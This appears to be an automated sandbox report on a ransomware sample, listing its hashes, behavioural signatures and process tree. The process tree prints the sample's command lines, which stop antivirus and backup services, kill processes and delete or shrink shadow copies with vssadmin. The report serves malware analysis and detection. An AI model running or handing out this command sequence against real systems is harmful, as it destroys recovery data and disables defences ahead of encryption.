Analysis
-
max time kernel
150s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
26-07-2021 12:58
Static task
static1
Behavioral task
behavioral1
Sample
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe
Resource
win10v20210408
General
-
Target
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe
-
Size
423KB
-
MD5
055c2fba242d03ae153be4a796c55ae2
-
SHA1
be71b94e30d5465d8b72e1fc7c0137024f97baee
-
SHA256
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024
-
SHA512
20b31f6db488d26c1f7564106e455a77461e8a9934718e72c6c917e3ec688a9a597a05f1b93584fd88d3e867f09a470eb90094e27c2525939894973d31498890
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exedescription ioc process File created C:\Users\Admin\Pictures\FormatDeny.png.crypted 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 1000 vssadmin.exe 580 vssadmin.exe 1140 vssadmin.exe 2216 vssadmin.exe 2136 vssadmin.exe 2064 vssadmin.exe 3744 vssadmin.exe 3524 vssadmin.exe 2788 vssadmin.exe 1328 vssadmin.exe 908 vssadmin.exe 3948 vssadmin.exe 196 vssadmin.exe 2212 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3160 taskkill.exe 2952 taskkill.exe 3772 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exepid process 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exetaskkill.exetaskkill.exetaskkill.exevssvc.exedescription pid process Token: SeDebugPrivilege 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe Token: SeDebugPrivilege 3160 taskkill.exe Token: SeDebugPrivilege 2952 taskkill.exe Token: SeDebugPrivilege 3772 taskkill.exe Token: SeBackupPrivilege 3148 vssvc.exe Token: SeRestorePrivilege 3148 vssvc.exe Token: SeAuditPrivilege 3148 vssvc.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 740 wrote to memory of 4048 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 740 wrote to memory of 4048 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 4048 wrote to memory of 3888 4048 net.exe net1.exe PID 4048 wrote to memory of 3888 4048 net.exe net1.exe PID 740 wrote to memory of 496 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 740 wrote to memory of 496 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 496 wrote to memory of 3148 496 net.exe net1.exe PID 496 wrote to memory of 3148 496 net.exe net1.exe PID 740 wrote to memory of 192 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 740 wrote to memory of 192 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 192 wrote to memory of 2272 192 net.exe net1.exe PID 192 wrote to memory of 2272 192 net.exe net1.exe PID 740 wrote to memory of 3700 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 740 wrote to memory of 3700 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 3700 wrote to memory of 3380 3700 net.exe net1.exe PID 3700 wrote to memory of 3380 3700 net.exe net1.exe PID 740 wrote to memory of 3140 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 740 wrote to memory of 3140 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe net.exe PID 3140 wrote to memory of 2212 3140 net.exe net1.exe PID 3140 wrote to memory of 2212 3140 net.exe net1.exe PID 740 wrote to memory of 2164 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe sc.exe PID 740 wrote to memory of 2164 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe sc.exe PID 740 wrote to memory of 3872 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe sc.exe PID 740 wrote to memory of 3872 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe sc.exe PID 740 wrote to memory of 1208 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe sc.exe PID 740 wrote to memory of 1208 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe sc.exe PID 740 wrote to memory of 3976 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe sc.exe PID 740 wrote to memory of 3976 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe sc.exe PID 740 wrote to memory of 3160 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe taskkill.exe PID 740 wrote to memory of 3160 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe taskkill.exe PID 740 wrote to memory of 2952 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe taskkill.exe PID 740 wrote to memory of 2952 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe taskkill.exe PID 740 wrote to memory of 3772 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe taskkill.exe PID 740 wrote to memory of 3772 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe taskkill.exe PID 740 wrote to memory of 2788 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2788 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 1328 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 1328 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2216 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2216 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2064 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2064 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2136 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2136 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 1000 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 1000 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 3744 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 3744 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 580 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 580 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 908 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 908 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 196 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 196 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 1140 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 1140 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2212 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 2212 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 3524 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 3524 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 3948 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe PID 740 wrote to memory of 3948 740 4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe vssadmin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe"C:\Users\Admin\AppData\Local\Temp\4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024.sample.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:3888
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:3148
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:192 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:2272
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:3380
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:2212
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:2164
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:3872
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1208
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3976
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3160 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3772 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2788 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:1328 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2216 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2064 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2136 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1000 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3744 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:580 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:908 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:196 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1140 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2212 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3524 -
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3948
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3148